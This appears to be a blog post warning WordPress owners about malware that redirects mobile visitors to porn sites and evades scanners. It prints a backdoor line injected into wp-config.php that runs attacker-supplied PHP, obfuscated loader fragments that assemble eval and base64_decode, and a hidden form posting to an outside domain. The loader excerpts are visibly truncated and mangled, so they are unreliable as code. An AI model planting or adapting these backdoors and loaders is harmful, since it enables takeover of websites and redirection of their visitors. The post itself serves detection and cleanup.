How about a malware infection on your WordPress website that did not give any hint to users on desktop browsers but redirect them to an adult or a pron website if they view the site on an mobile device like iPhone, Android or Opera etc?

Recently there have been many reports of websites facing issues which is too hard to detect even by scanners like sucuri where the malware gets detected at first and then on the second scan you find nothing. This stratgery of the malware behind going clean for a while after the first visit is to deceive the mobile users and make them belive they typed the wrong URL. The sites go un-redirected for a few hours on mobile devices for returning users and again the user is redirected to the adult sites after sometime.

The desktop browsers did not show any symptom of the redirection on the other hand and it is very difficult to trace the issue.

How it looks like?

There is malicious code inserted on the top of the files including
index.php
wp-config.php
funtions.php
There are other files created with a name (..) dot dot.

What is injected?

This line is found to be added on the wp-config file.

if (isset($_REQUEST['FILE'])){$_FILE = $_REQUEST['dsdssdsdsdsdsdsdsdsdsd']('$_',$_REQUEST['FILE'].'($_);'); $_FILE(stripslasshes($_REQUEST['HOST']));}

A large text block in encrypted form could be found on top of one or many php files in your WordPress installation that make the WordPress site redirect to porn sites.


< ? php funct.. dpw0ssVt9TUW7g($f8QrZ16WY6L3Ati2VypMQHx9G,$Bte0ydYeuO5qAUncOOvW,$SkWT1uh){return str_repla(..$f8QrZ16WY6L3Ati2VypMQHx9G,$Bte0ydYeuO5qAUncOOvW,$SkWT1uhaasdf function xaQ7AXovsa2Ls1kO67aZeDSo($f8QrZ16WY6L3Ati2VypMQHx9G,$Bte0ydYeuO5qAUncOOvW,$SkWT1uh){return str_replace($f8QrZ16WY6L3Ati2VypMQHx9G,$Bte0ydYeuO5qAUncOOvW,$SkWT1uh} function WGts9IveXw3hD2j8Ub4yc($f8QrZ16WY6L3Ati2VypMQHx9G,$Bte0ydYeuO5qAUncOOvW,$SkWT1uh){return str_replace($f8QrZ16WY6L3Ati2VypMQHx9G,$Bte0ydYeuO5qAUncOOvW,$SkWT1uh) } $fEKSddqgAb1AHM96Tf = 'bdSy1ZBXjadSy1ZBXjsdSy1ZBXjedSy1ZBXj6dSy1ZBXj4dSy1ZBXj_dSy1ZBXjddSy1ZBXjedSy1ZBXjcdSy1ZBXjodSy1ZBXjddSy1ZBXje'; $fEKSddqgAb1AHM96Tf = WGts9IveXw3hD2j8Ub4yc('dSy1ZBXj','',$fEKSddqgAb1AHM96Tf); $TW4rFzlZF2JDF3nQNUaI = 'cc7UGBvoEyELYGCpdeoaYth9rc7UGBvoEyELYGCpdeoaYth9ec7UGBvoEyELYGCpdeoaYth9ac7UGBvoEyELYGCpdeoaYth9tc7UGBvoEyELYGCpdeoaYth9ec7UGBvoEyELYGCpdeoaYth9_c7UGBvoEyELYGCpdeoaYth9fc7UGBvoEyELYGCpdeoaYth9uc7UGBvoEyELYGCpdeoaYth9nc7UGBvoEyELYGCpdeoaYth9cc7UGBvoEyELYGCpdeoaYth9tc7UGBvoEyELYGCpdeoaYth9ic7UGBvoEyELYGCpdeoaYth9oc7UGBvoEyELYGCpd..

Another code that is inserted on top of the php files


< ? .php .funct.jkn LEGH7Gab($vvxn6nCotS4,$LpFwWkU0Jlad,$zboIc61yuevHHJ1p){return str_replace($vvxn6nCotS4,$LpFwWkU0Jlad,$zboIc61yuevHHJ1p);} function wCdmruP5.KZprgpQfPuf9HOydy($vvxn6nCotS4,$LpFwWkU0Jlad,$zboIc61y.uevHHJ1pjketurn str_replace($vvxn6nCotS4,$LpFwWkU0Jlad,$zboIc61y.uevHH:Jjk);} function yjkyGTcgfgx($vvxn6nCotS4,$LpFwWkU0Jlad,$zboIc61yuevHHJ1p){return str_repjkQqZ9P = 'bHiQSRAoa3JIftkaHiQSRAoa3jkftjkiQSRAoa3JIftkeHiQSRAoa3JIftkcHiQSRAoa3JIftkoHiQSRAoa3JIftkdHiQSRAoa3JIftke'; $IrlAQbZXmtTQqZ9P = ymIyGTcgfgx('HiQ.SRAoa3JIftk','jkjlAQbZXmtTQqZ9P); $LJYPiGE1oHRwfZrCjZCUhcl0h = 'cowdrx3eKmYqDOqjtQrowdrx3eKmYqDOqjtQeowdrx3eKmYqDOqjtQaowdrx3eKmYqDOqjtQtowdrx3eKmY.qDOqjtQeowdrx3jkdrx3eKmYqDOqjtQcowdrx3eKmYqDOqjtQtowdrx3eKmYqDOqjtQiowdr:x3eKmYqDOqjtQoowdrx3eKmYqDOqjtQn'; $LJYPiGE1oHRwfZrCjhZCUhcl0h = ymIyGTcgfgx('owdrx3eKmYqDOqjtQ','',$LJYPiGE1oHRwfZrCjZCUhcl0h); $CUUZoRydx = 'az9ANeaz9ANvaz9ANaaz9ANl'; $CUUZoRydx = ymIyGTcgfgx('az9Akj'',

What it put on the page is something like this (Which a user did not see)

<>form method=POST action="http://gridironservices.com/579205f64a3c6…php?q=b9f6606dcd0186725..” id=”re foto_form” target=”_top”>

Cleaning this malware could be very typical for large websites with lots of files as the code could be inserted on many .php files and if your website shows symptom of redirecting to another url and you think it's just a typo while entering the URL you need to check the major files like index.php and funtions.php in theme directory and the wp-config.php file in WordPress installation root.

%d bloggers like this: